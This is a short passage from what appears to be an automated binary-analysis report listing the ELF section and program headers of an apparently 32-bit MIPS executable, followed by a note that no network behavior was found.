          .dataPROGBITS0x4634000x234000x2c00x00x3WA0016
          .gotPROGBITS0x4636c00x236c00x5880x40x10000003WAp0016
          .sbssNOBITS0x463c480x23c480x240x00x10000003WAp004
          .bssNOBITS0x463c700x23c480xa980x00x3WA0016
          .mdebug.abi32PROGBITS0x84c0x23c480x00x00x0001
          .shstrtabSTRTAB0x00x23c480x640x00x0001
          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
          LOAD0x00x4000000x4000000x233d00x233d05.72290x5R E0x10000.init .text .fini .rodata
          LOAD0x233d40x4633d40x4633d40x8740x13343.94090x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
          No network behavior found

          System Behavior